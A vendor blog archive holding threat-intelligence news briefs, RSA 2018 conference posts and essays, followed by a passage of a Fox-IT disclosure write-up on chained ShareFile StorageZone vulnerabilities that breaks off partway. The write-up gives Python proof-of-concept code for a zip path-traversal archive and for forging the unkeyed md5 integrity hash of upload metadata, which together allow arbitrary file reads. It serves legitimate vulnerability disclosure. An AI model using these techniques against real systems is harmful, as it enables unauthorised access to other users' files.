Category Archives: Blog

Threat Intelligence Brief: April 18, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“Great Western Railway urges online customers to update passwords after cyber-attack. The firm said hackers used an automated system to gain access to 1,000 customer accounts on its website and is taking action. While only a very small number of accounts have been affected by the attack, cybersecurity experts are complimenting the company’s proactive efforts to inform its customers of the best practice in these situations.”

 –The Sun


“A cyberattack that U.S. natural gas pipeline owners weren’t required to report has lawmakers taking a closer look at how the industry is handling such threats, raising the prospect of tighter regulation. “In website notices to customers this week, at least seven pipeline operators from Energy Transfer Partners LP to TransCanada Corp. said their third-party electronic communications systems were shut down, with five confirming the service disruptions were caused by hacking. But the companies didn’t have to alert the U.S. Transportation Security Administration, the agency that oversees the nation’s more than 2.6 million miles of oil and gas conduits in addition to providing security at airports.” “Though the cyberattack didn’t disrupt the supply of gas to U.S. homes and businesses, it underscores that energy companies from power providers to pipeline operators and oil drillers are increasingly vulnerable to electronic sabotage. It also showed how even a minor attack can have ripple effects, forcing utilities to warn of billing delays and making it more difficult for analysts and traders to predict a key government report on gas stockpiles.” “At a congressional hearing in March, Maria Cantwell, a Democratic senator from Washington, told Perry that budget cuts could make it more difficult to shield the energy sector from cyber intrusions. “Our energy infrastructure is under attack,”’ Cantwell said. “A year ago, I called for a comprehensive assessment of cyber attacks to our grid by Russians. We don’t need rhetoric at this point – we need action.” The threat appears to be widespread. Two years ago, the Department of Energy’s Pacific Northwest National Laboratory in Richland, Washington, said its firewall system blocks 25,000 cyberattacks a day.””


Information Security Risk

“Several vulnerabilities have been found in the Linux command line tool Beep, including a potentially serious issue introduced by a patch for a privilege escalation flaw. An unnamed researcher discovered recently that Beep versions through 1.3.4 are affected by a race condition that allows a local attacker to escalate privileges to root. The security hole has been assigned CVE-2018-0492 and it has been sarcastically described as “the latest breakthrough in the field of acoustic cyber security research.” Someone created a dedicated website for it (, a logo, and named it “Holey Beep.” The individual or individuals who set up the Holey Beep website have also provided a patch, but someone noticed that this fix actually introduces a potentially more serious vulnerability that allows arbitrary command execution.”

Security Week

Operational Risk

“The UK has conducted a “major offensive cyber-campaign” against the Islamic State group, the director of the intelligence agency GCHQ has revealed. The operation hindered the group’s ability to co-ordinate attacks and suppressed its propaganda, former MI5 agent Jeremy Fleming said. It is the first time the UK has systematically degraded an adversary’s online efforts in a military campaign. Mr Fleming made the remarks in his first public speech as GCHQ director. “The outcomes of these operations are wide-ranging,” he told the Cyber UK conference in Manchester. Mr Fleming said much of the cyber-operation was “too sensitive to talk about”, but had disrupted the group’s online activities and even destroyed equipment and networks. “This campaign shows how targeted and effective offensive cyber can be,” he added. But Mr Fleming said the fight against IS was not over, because the group continued to “seek to carry out or inspire further attacks in the UK” and find new “ungoverned spaces to base their operations”.”


The post Threat Intelligence Brief: April 18, 2018 appeared first on LookingGlass Cyber Solutions Inc..

5 Things to Do at RSA 2018

It's RSA Conference week! Are you excited? As you're putting last minute plans together, check out our list of five things you should do while you're attending RSA Conference 2018 in San Francisco:  


  1. Attend a Keynote

On Wednesday, April 18, Samir Kapuria, Senior Vice President and General Manager of Cyber Security Services at Symantec, will discuss how rethinking the future of cybersecurity means understanding its past in his session, At The Edge of Prediction: A Look Back to the Future of Cybersecurity .  


  1.  Party with us!

We don't want to get too ahead of ourselves, but some people are saying this might be "the party of the conference." RSVP for our party with DomainTools at 46 Minna. We'll have an open bar, hors d'oeuvres, and a DJ, plus you'll get to network with the best and brightest of the security industry.


  1. Visit the MOMA

When you have some time to spare, make sure to set aside an hour or two to soak up art and culture at San Francisco's Museum of Modern Art. Just steps away from the Moscone Center, you can take a breather from the hectic show floor and enjoy a moment of reflection at the museum.


  1. Eat at Hops & Hominy

It's no secret that we love our craft brews over here at ThreatConnect. So it wouldn't be right if we didn't recommend a trip to Hops & Hominy for southern soul food and a variety of microbrews. If you make it a meal there, make sure to stop by our booth and let us know which you loved more: the comfort food or the 21 rotating beers on tap.


  1. Stop by the ThreatConnect booth!

Don't miss the reveal of our next t-shirt and your chance to see a personalized demo. We'll also be raffling off a DJI Mavic Drone.. With all this fun in store, ours should be the first booth you head to when the show floor opens (and yes we are a little biased). You can find us at booth #3231 in the North Hall.


See you there!

The post 5 Things to Do at RSA 2018 appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

RSA Preview: Compromised Credentials are STILL Your Organization’s Worst Nightmare

RSA, the industry’s biggest (arguably) conference, starts this week. Before you get blinded by all of the shiny new technology and product and acquisition announcements, remember that having clean cybersecurity hygiene begins with the basics – patch and routinely update your systems, educate your employees, protect your passwords.

LookingGlass has access to a lot of places on the Internet, including the Deep and Dark Web where most data dumps and passwords leaks occur. Armed with this information, we are able to maintais a proprietary Data Breach Detection System (DBDS) that continuously scours underground forums, hacker channels, and the dark web to uncover the latest data breaches and identify compromised accounts. Adding an average of several million findings per week, this system contains almost 5 billion records that are connected to approximately 3.5 billion unique username/password pairs.

As we see cyber attacks increase in size and sophistication, we often forget that some of the biggest attacks started with basic password cracking, or phishing/social engineering scheme. Analyzing compromised credentials can reveal a lot about the cybersecurity practices of organization’s across verticals, and of all sizes. LookingGlass reviewed all compromised credentials within our DBDS from 2017 for the Fortune 100 companies and discovered that the most heavily-impacted business sectors were Technology, Financial, Insurance, and Telecommunications. The below chart compares the unique credentials LookingGlass uncovered in 2017 for the Fortune 100 companies by sector.

In addition, across all Fortune 100 companies, an average of 33% of all employees reused their login credentials. Organizations within the Telecommunications sector represented the highest percentage of reused login credentials, with nearly 45% of employees reusing usernames and passwords across multiple IT systems and web applications.

Credential reuse is a significant concern to organizations across all business sectors because threat actors routinely use lists of these compromised credentials to gain access to business networks via web applications and other public-facing network infrastructure.  For example, it is simple for a threat actor to check for Web-based email services associated with each domain, potentially allowing a hacker to access the user’s work email account and to view or exfiltrate any sensitive information it may contain.

Assuming that the LookingGlass sample for Fortune 100 companies is a reflection of global organizational trends in credential security hygiene, we judge that at least one-third to one-half of the compromised credentials could likely facilitate illicit access, or cause otherwise negative repercussions, to many organizations. This threat is further exacerbated if an organization is unaware of credential compromises relevant to them or does not have other security measures in place to mitigate the risk of compromised credentials, such as two-factor authentication.

3 Steps Organizations Can Take to Protect User Credentials

  1. Encourage and Enforce Password Hygiene Best Practices – Educate employees on best practices associated with password hygiene (i.e. frequently change credentials, diversify passwords across account, etc.). Require employees to routinely update their passwords and avoid repeated use across multiple platforms.
  2. Manage Your Third Party Risks – Consistently monitor who is accessing your network and hardware. Are they trying to access areas of the network they shouldn’t be? Limit third parties’ access to specific portions of the network instead of allowing them to roam free.
  3. Back Up Your Data! – If your credentials are compromised, it will be easier to replace than to start from scratch.
  4. Educate Your Employees – Phishing attacks are still one of the biggest ways organizaiton’s are breached. Don’t give away confidential information, like your password.


How Can LookingGlass Help These Steps?

LookingGlass offers tiered solutions to help organizations deal with the risks compromised credentials pose to you and your key vendors:

  • The LookingGlass Baseline Attack Surface Report™ is a cost-effective first step in determining which of your vendors pose the most risk to your organization. Your report will not only provide a historical analysis but also help you meet compliance and regulatory requirements when the occasion arises.
  • The LookingGlass Cyber Attack Surface Analysis™ is a deep-dive assessment of vendors that may have access to your organization’s networks and sensitive data. It not only provides a historical analysis of potential compromise, but may also assist your organization in meeting compliance and regulatory requirements. In addition, the Cyber Attack Surface Analysis can evaluate the cybersecurity hygiene of a company when conducting M&A activity.
  • The LookingGlass Third Party Risk Monitoring service delivers continuous visibility into the risk exposure and attack surface of your organization’s key vendors. This is an outsourced way to analyze your third party vendors’ risk impact to your organization. Our managed service keeps a watchful eye on your vendors’ networks 7/24/365, helping you to make informed, intelligent decisions about the cyber safety of your organization.


In addition, protect your organization’s attack surface with one of the LookingGlass “as-a-Service” offerings: Information Security, Brand Security, or Physical Security Monitoring:

  • Information Security-as-a-Service™: Protect your organization’s network and sensitive data. LookingGlass analysts monitor and identify information security threats such as phishing, malware, ransomware, and more.
  • Brand Security-as-a-Service™: Protect your organization’s brand, trademarks/logos, intellectual property, and online reputation.
  • Physical Security Monitoring-as-a-Service™: LookingGlass analysts monitor for risks to your organization’s most valuable physical assets, such as imposter social media accounts, unauthorized domain names, and threats against employees, executives, and facilities.

Interested in learning more about any of our offerings, or want to chat with one of our security experts? Find us at RSA – Booth 100 in the South Hall.

The post RSA Preview: Compromised Credentials are STILL Your Organization’s Worst Nightmare appeared first on LookingGlass Cyber Solutions Inc..

The Power and Responsibility of Customer Data and Analytics

How ThreatConnect stores, uses, and protects customer data


There has been a lot of recent news surrounding compromises in trust where companies purposefully or unintentionally misuse or allow others to misuse customer data. After my last post, in which I talked about the power of data and analytics, I thought it would a good time to describe ThreatConnect's efforts around storing, using, and protecting our customers' data.  




Let me start by explaining the types of data that reside in the ThreatConnect Cloud and CAL™ (Collective Analytics Layer) and how that data is stored and used. I'm not going to speak to Dedicated Cloud or On-Premises, because those platform configurations are often customized based on organizational policies or regulatory requirements.  


ThreatConnect Cloud consists of the Multi-Tenant ThreatConnect Cloud and CAL™. Users (both free and paid) interact with the ThreatConnect Cloud through either direct logins or integrations with other technologies. ThreatConnect Cloud data is either stored in their own private account or organization, a community, or a source. Restrictions for sharing and usage are specific to the source they are stored within.  


Where data resides Data Owner Data Users
Individual Account Individual Only Individual
Organization Account Organization All Users of an Organization
Community Community Access granted by community administrators
Data Source Source Owner Access granted by source administrators to source participants


Data sharing to a community is up to the organization or user that owns the data. ThreatConnect acts as a member of some of the communities, and as such, has the same rights and privileges as all of its members.

For example, we may be a member of a particular industry community and the rules of the community could allow anyone to use the data under traffic light protocol (TLP): White guidelines. If a community administrator invited us to the community, and the data was marked TLP:WHITE, any vetted community member would possibly leverage the information in some aspect of their work. To reiterate, this means that ThreatConnect would only use said data by virtue of our membership to the community in accordance with the community usage guidelines.

ThreatConnect CAL collects anonymous data from all participating instances of ThreatConnect, including ThreatConnect Cloud. Through large data analysis, CAL provides insights and recommendations that are delivered back to any participating ThreatConnect instance - Cloud, Dedicated Cloud, and On-Premises. These insights can take many forms, including classification of indicators and indicator reputation. We've designed these insights to be a boost to in-platform analytics, such as ThreatAssess and Playbooks.  

Users of Dedicated Cloud and On-Premises instances of the Platform can choose whether they want to leverage CAL or not. When turned off, both anonymous sharing with CAL and CAL insights are disabled. If you want to have the benefits of CAL, but keep some indicators private, you can also do that by marking indicators as private in your instance. The table below summarizes the data CAL collects from participants, and the value it derives from the data:


Customer Data Used by CAL Value Provided
IOC False Positive Vote (Count) Provides count of False Positives across CAL-connected platforms and drives CAL recommendations for reputation and indicator status
IOC Impressions (Count) Provides count of page views, searches, and automated lookups and drives CAL recommendations for reputation and indicator status.
IOC Observations (Count) Provides count of reported observations of IOC across CAL connected platforms drives CAL recommendations for reputation and indicator status
IOC Status (Active/Inactive) Provides a holistic picture of which indicators users want to keep active or inactive in their instance, allowing CAL to recommend better indicator status and reduce time wasted on "junk" IOC's for participants.


To reiterate, all of the above information is captured and processed in an anonymized, aggregated fashion. After authentication, any identifying information about your instance is separated from the data and it is combined to provide our analytics an understanding of how to treat the data. To put another way, we don't track or care about who submitted any of the above information, but rather how many participants submitted it.

Finally, ThreatConnect software instances may be connected to our user feedback platform in order for our product managers and customer success personnel to learn more about our customers' usage. This is common among most software vendors, as the insights gleaned allow our company to improve our software experience and identify data-driven ways to help our users do their jobs better. Participation in this platform also enables us to deliver interactive guides in the application to help users hit the ground running. Dedicated Cloud and On-Premises software instances can turn off this feature if they want.  

Your data, and privacy, is of the utmost importance to us. We have made, and continue to make, major investments to protect the data you entrust to us. Our Information Security Management System (ISMS) is built on the ISO 27001:2013 set of standards to ensure that we appropriately secure ThreatConnect. Also, We've researched GDPR extensively and are taking actions to assure compliance.  

If you have any questions regarding our corporate security program or your data privacy please use the CONTACT US form and select "Security Program/Compliance" from the dropdown menu.

The post The Power and Responsibility of Customer Data and Analytics appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Why Cyber Response Mechanisms Must Talk to Each Other…

As I was preparing to write this blog on the importance of interoperability across cyber defense systems, I read the following news article “Why America’s Two Best Fighter Jets Can’t Talk to Each Other”. One of the salient points in this article is that reportedly the communication systems in the newer model fighter jet is not integrated with an older model fighter jet.

Two article quotes drew my attention particularly:

“The U.S. fifth-generation jets are adept at disseminating a more detailed view of the battle space to older aircraft, increasing the former’s “survivability” in combat…”

“The thing that’s great about having Link 16 and MADL onboard and the sensor fusion is the amount of situational awareness the pilot has…”

An integrated communication system is a vital part of these fighter jets and the combined strength those fighters provide. A similar point can be made about the lack of interoperability and easy integration in cyber defense between cybersecurity systems.

The issues these fighter jets have illustrates the technical, business, and organizational challenges that can get in the way of technology integrations necessary for the effective use of technology intended to protect and defend. More importantly, the impact on the security of organizations can be significant when defensive systems are not integrated in meaningful and effective ways.

Recently, I had the opportunity to discuss the key challenges faced in cyber defense integration in a joint webinar with Jason Keirstead (IBM Security) and Henry Peltokangas (Cisco Systems) on Cyber Threat Intelligence Collaboration.


Why does interoperability matter?

Whether at a small-medium enterprise or the largest multi-national organization, most security deployments generally share these common characteristic:

No Single Vendor

  • Typically, there is no single vendor that has deployed all of the systems that must exchange Cyber Threat Intelligence (CTI) and Security telemetry (e.g. events, logs).
  • Many organizations choose best of breed for firewalls vs. identity authentication vs. Intrusion Detection Systems (IDS) vs. web proxies vs. threat analysis platforms.


  • One of the primary reasons for having different products (from different vendors) in a security deployment is that each product performs vital tasks and functions and may not even be run or operated by the same security analysis and security operations teams.

Coordinated Action

  • Teams and their respective products must work collaboratively to collect, analyze, refine, and ultimately operationalize CTI.
  • The complexity involved in building security systems can be quite daunting but it becomes even more complex if those systems need to share data and actions to make security work successfully.
  • Often times, real-time data may indicate a threat that must be acted upon quickly but without suitable interoperable systems working collaboratively it’s almost impossible to provide an effective real-time response.

Ultimately, the goals for interoperability are to drive ease of deployment, ease of maintenance, and ensure that complex systems tasks can be performed when they connect together.

Sounds easy?

Here’s a recent example that helps explain the challenge:

Real World Technology Fail Example

In the above scenario, a multi-national organization purchased a Threat Intelligence Platform (TIP) from one vendor and an Endpoint Protection system from a second vendor. Both vendors had developed their products to exchange OASIS STIX/TAXII Version 1 standards-based intelligence. Both vendors claimed their products supported the standard protocol and content.

When the multi-national organization came to connect those systems together the TIP and Endpoint Protection system failed to exchange intelligence correctly. After initially trying to debug the issue themselves, the organization escalated the integration challenges to both vendors to resolve the communication issues.

Fortunately, in this scenario both vendors were able to investigate and come up with a solution to integrate the CTI products successfully. However, the reality is that even with standards (as a basis for security integration), there remains ample opportunity for technology companies to miss important aspects that end up sabotaging off-the-shelf integration with other vendors.

The Impact

The above example shows the negative consequences that  integrating products from various vendors has on security. More specifically, the following areas are most impacted:

Expertise & Human Assets

  • To understand technically what is working.
  • Organizations have to learn a lot more about what technology is doing to share the content between systems.
  • Takes time to either hire or train folks, as well as to learn about the different product interfaces instead of just expecting them to ‘work’.

Time & Costs

  • Multiple days or weeks to make it ‘work’.
  • Multiple organizations involved.
  • Costs of people and systems time without operational benefits.


  • Point products have limits to what features they provide as standalone solutions.
  • Point products are limited to what they can detect and block when not an integrated system.
  • Introducing CTI into deployments consisting of multiple point products results in the worst case where each product has its own blacklist or method of consuming the intelligence and the security team has to manually copy/paste the intelligence to each.
  • It adds huge amounts of human error that can undermine protection.
  • In many cases, the lack of coordinate capability can cause unexpected results and worse, could undermine protection.

As a result, the true winners are the adversaries.

What should we do?

There are a few ways to improve and implement interoperability in your organization. In my next blog, I’ll give you some best practices including:

  • STIX Preferred program
  • Interoperability key tenants

If you want to discuss this blog or integrated LookingGlass cyber defense solutions please reach to myself on Twitter (@tweet_a_t) or contact us. If you are going to RSA 2018 please come to the STIX and TAXII Meet-up on April 18, 2018 to chat with me more on this topic.


The post Why Cyber Response Mechanisms Must Talk to Each Other… appeared first on LookingGlass Cyber Solutions Inc..

Threat Intelligence Brief: April 11, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Information Security Risk

“Retailer Hudson’s Bay Co disclosed that it was the victim of a security breach that compromised data on payment cards used at Saks and Lord & Taylor stores in North America. One cyber security firm said that it has evidence that millions of cards may have been compromised, which would make the breach one of the largest involving payment cards over the past year, but added that it was too soon to confirm whether that was the case. Hacking group JokerStash a.k.a. Fin7 is alleged to have spent a year collecting payment card records with the intention of selling the compromised accounts on the dark web.”


Insurance + Healthcare

“New Jersey’s Division of Consumer Affairs is levying a fine against Virtua Medical Group after the provider organization suffered a breach that released the protected health information of several hundred of its patients two years ago. The network of physicians, which spans more than 50 South Jersey practices and part of the Virtua Health delivery system, will pay a total of $417,816 and improve data security following a breach of protected health information affecting 1,654 patients whose health records were found to be viewable on the Internet because of a server misconfiguration by a vendor in January 2016.”

Health Data Management


“Sears Holding Corp, Best Buy, and Delta Air Lines have announced that some of their customer payment information may have been exposed in a cyber security breach at software service provider [24] In a statement made by Delta Airline, cybercriminals planted a piece of malware in [24] software, which captured some payment card data between September 26 and October 12, 2017. Sears and Delta said they were only notified by [24] in mid and late March, several months after the breach had been supposedly contained.”


Operational Risk

“Malaysia’s central bank announced that it has suffered a cyberattack in which hackers sought to steal money through fraudulent wire transfers over the SWIFT network. The bank did not disclose who was behind the attack or how they accessed its SWIFT servers while also noting that no funds were lost. The incident marked the second known hack of a central bank after the 2016 theft of $81 million from the Bangladesh Bank. ”


The post Threat Intelligence Brief: April 11, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Security Product Management at Large Companies vs. Startups

Is it better to perform product management of information security solutions at a large company or at a startup? Picking the setting that’s right for you isn’t as simple as craving the exuberant energy of a young firm or coveting the resources and brand of an organization that’s been around for a while. Each environment has its challenges and advantages for product managers. The type of innovation, nature of collaboration, sales dynamics, and cultural nuances are among the factors to consider when deciding which setting is best for you.

The perspective below is based on my product management experiences in the field information security, though I suspect it’s applicable to product managers in other hi-tech environments.

Product Management at a Large Firm

In the world of information security, industry incumbents are usually large organizations. This is in part because growing in a way that satisfies investors generally requires the financial might, brand and customer access that’s hard for small cyber-security companies to achieve. Moreover, customers who are not early adopters often find it easier to focus their purchasing on a single provider of unified infosec solutions. These dynamics set the context for the product manager’s role at large firms.

Access to Customers

Though the specifics differs across organizations, product management often involves defining capabilities and driving adoption. The product manager’s most significant advantage at a large company is probably access to customers. This is due to the size of the firm’s sales and marketing organization, as well as due to the large number of companies that have already purchased some of the company’s products.

Such access helps with understanding requirements for new products, improving existing technologies, and finding new customers. For example, you could bring your product to a new geography by using the sales force present in that area without having to hire a dedicated team. Also, it’s easier to upsell a complementary solution than build a new customer relationship from scratch.

Access to Expertise

Another benefit of a large organization is access to funds and expertise that’s sometimes hard to obtain in a young, small company. Instead of hiring a full-time specialist for a particular task, you might be able to draw upon the skills and experience of someone who supports multiple products and teams. In addition, assuming your efforts receive the necessary funding, you might find it easier to pursue product objectives and enter new markets in a way that could be hard for a startup to accomplish. This isn’t always easy, because budgetary planning in large companies can be more onerous than Venture Capitalist fund raising.

Organizational Structure

Working in any capacity at an established firm requires that you understand and follow the often-changing bureaucratic processes inherent to any large entity. Depending on the organization’s structure, product managers in such environments might lack the direct control over the teams vital to the success of their product. Therefore, the product manager needs to excel at forming cross-functional relationships and influencing indirectly. (Coincidentally, this is also a key skill-set for many Chief Information Security Officers.)

Sometimes even understanding all of your own objectives and success criteria in such environments can be challenging. It can be even harder to stay abreast of the responsibilities of others in the corporate structure. On the other hand, one of the upsides of a large organization is the room to grow one’s responsibilities vertically and horizontally without switching organizations. This is often impractical in small companies.

What It’s Like at a Large Firm

In a nutshell, these are the characteristics inherent to product management roles at large companies:

  • An established sales organization, which provides access to customers
  • Potentially-conflicting priorities and incentives with groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially-easier access to funding for sophisticated projects and complex products
  • Possibly-easier access to the needed expertise
  • Well-defined career development roadmap

I loved working as a security product manager at a large company. I was able to oversee a range of in-house software products and managed services that focused on data security. One of my solutions involved custom-developed hardware, with integrated home-grown and third-party software, serviced a team of help desk and in-the-field technicians. A fun challenge!

I also appreciated the chance to develop expertise in the industries that my employer serviced, so I could position infosec benefits in the context relevant to those customers. I enjoyed staying abreast of the social dynamics and politics of a siloed, matrixed organization. After awhile I decided to leave because I was starting to feel a bit too comfortable. I also developed an appetite for risk and began craving the energy inherent to startups.

Product Management in a Startup

One of the most liberating, yet scary aspects of product management at a startup is that you’re starting the product from a clean slate. On the other hand, while product managers at established companies often need to account for legacy requirements and internal dependencies, a young firm is generally free of such entanglements, at least at the onset of its journey.

What markets are we targeting? How will we reach customers? What comprises the minimum viable product? Though product managers ask such questions in all types of companies, startups are less likely to survive erroneous answers in the long term. Fortunately, short-term experiments are easier to perform to validate ideas before making strategic commitments.

Experimenting With Capabilities

Working in a small, nimble company allows the product manager to quickly experiment with ideas, get them implemented, introduce them into the field, and gather feedback. In the world of infosec, rapidly iterating through defensive capabilities of the product is useful for multiple reasons, including the ability to assess—based on real-world feedback—whether the approach works against threats.

Have an idea that is so crazy, it just might work? In a startup, you’re more likely to have a chance to try some aspect of your approach, so you can rapidly determine whether it’s worth pursuing further. Moreover, given the mindshare that the industry’s incumbents have with customers, fast iterations help understand which product capabilities, delivered by the startup, the customers will truly value.

Fluid Responsibilities

In all companies, almost every individual has a certain role for which they’ve been hired. Yet, the specific responsibilities assigned to that role in a young firm often benefit from the person’s interpretation, and are based on the person’s strengths and the company’s need at a given moment. A security product manager working at a startup might need to assist with pre-sales activities, take a part in marketing projects, perform threat research and potentially develop proof-of-concept code, depending on what expertise the person possesses and what the company requires.

People in a small company are less likely to have the “it’s not my job attitude” than those in highly-structured, large organizations. A startup generally has fewer silos, making it easier to engage in activities that interest the person even if they are outside his or her direct responsibilities. This can be stressful and draining at times. On the other hand, it makes it difficult to get bored, and also gives the product manager an opportunity to acquire skills in areas tangential to product management. (For additional details regarding this, see my article What’s It Like to Join a Startup’s Executive Team?)

Customer Reach

Product manager’s access to customers and prospects at a startup tends to be more immediate and direct than at a large corporation. This is in part because of the many hats that the product manager needs to wear, sometimes acting as a sales engineer and at times helping with support duties. These tasks give the person the opportunity to hear unfiltered feedback from current and potential users of the product.

However, a young company simply lacks the scale of the sales force that accommodates reaching many customers until the firm builds up steam. (See Access to Customers above.) This means that the product manager might need to help identifying prospects, which can be outside the comfort zone of individuals who haven’t participated in sales efforts in this capacity.

What It’s Like at a Startup

Here are the key aspects of performing product management at a startup:

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

I’m presently responsible for product management at Minerva Labs, a young endpoint security company. I’m loving the make-or-break feeling of the startup. For the first time, I’m overseeing the direction of a core product that’s built in-house, rather than managing a solution built upon third-party technology. It’s gratifying to be involved in the creation of new technology in such a direct way.

There are lots of challenges, of course, but every day feels like an adventure, as we fight for the seat at the big kids table, grow the customer base and break new ground with innovative anti-malware approaches. It’s a risky environment with high highs and low lows, but it feels like the right place for me right now.

Which Setting is Best for You?

Numerous differences between startups and large companies affect the experience of working in these firms. The distinction is highly pronounced for product managers, who oversee the creation of the solutions sold by these companies. You need to understand these differences prior to deciding which of the environments is best for you, but that’s just a start. Next, understand what is best for you, given where you are in life and your professional development. Sometimes the capabilities that you as a product manager will have in an established firm will be just right; at others, you will thrive in a startup. Work in the environment that appeals to you, but also know when (or whether) it’s time to make a change.

Compromising ShareFile on-premise via 7 chained vulnerabilities

A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog describes how Fox-IT identified several vulnerabilities, which together allowed any account to access any file stored within ShareFile. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to their cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several fortune-500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the Cloud or with an on-premise component).


Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which is the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the filetransfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request such as the filename, file size, et cetera. It also contains an uploadid which is used to identify the upload. Lastly we see a h= parameter, followed by a base64 encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following python code creates a special zip file called, which contains two files, one of which has a relative path.

import sys, zipfile
#the name of the zip file to generate
zf = zipfile.ZipFile('', 'w')
#the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'xxe_oob.xml'
#destination path of the file
zf.write(fname, '../../../../testbestand_fox.tmp')
#random extra file (not required)
#example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but that we were able to successfully change the directory to which the file was extracted. This vulnerability can be used to write user controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine the default extraction path would be c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\ we can add a file with the name ../storage/subdirectory/filename.txt which will then be written to the target directory. The ../ part indicates that the Operating System should go one directory higher in the directory tree and use the rest of the path from that location.

Vulnerability 1: Path traversal in archive extraction

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistenstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

When a new upload was initialized, the URLs contained a parameter called uploadid. As the name already indicates this is the ID assigned to the upload, in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there are folders for each upload matching with this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:


In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name, the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32 character long uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond with the file ID for the upload and folder ID to which the file is uploaded respectively.

After trying to figure out for a while what kind of hashing algorithm was used for the integrity check of this file, it turned out that it is a simple md5 hash of the rest of the data in the info.txt file. The twist here is that the data is encoded with UTF-16-LE, which is default for Unicode strings in Windows.

Armed with this knowledge we can write a simple python script which calculates the correct hash over a modified info.txt file and write this back to disk:

import md5
with open('info_modified.txt','r') as infile:
instr ='|')
instr2 = u'|'.join(instr[:-1])
outhash ='utf-16-le')).hexdigest().upper()
with open('info_out.txt','w') as outfile:
outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the info.txt file is not verified for integrity using a secret only known by the application, but is only validated with an md5 hash against corruption. This gives an attacker that can write to the storage folders the possibility to alter the upload information.

Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as temporary name for the file. The data that is uploaded is written to this file, and when the upload is finilized this file is added to the users ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename to attempt to extract a test file called secret.txt which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the filesize of the secret.txt file we are trying to extract is 14 bytes instead of 13 as the modified info.txt indicated. We can upload a new info.txt file which does have the correct filesize, and the secret.txt file is succesfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, which is in the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we’ve turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we do know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, and thus an attacker does not need to have an info.txt file to perform this attack.

Investigating file downloads

So far, we’ve only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the frequested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter which contains the download token. Additionally there is a h parameter which contains a HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

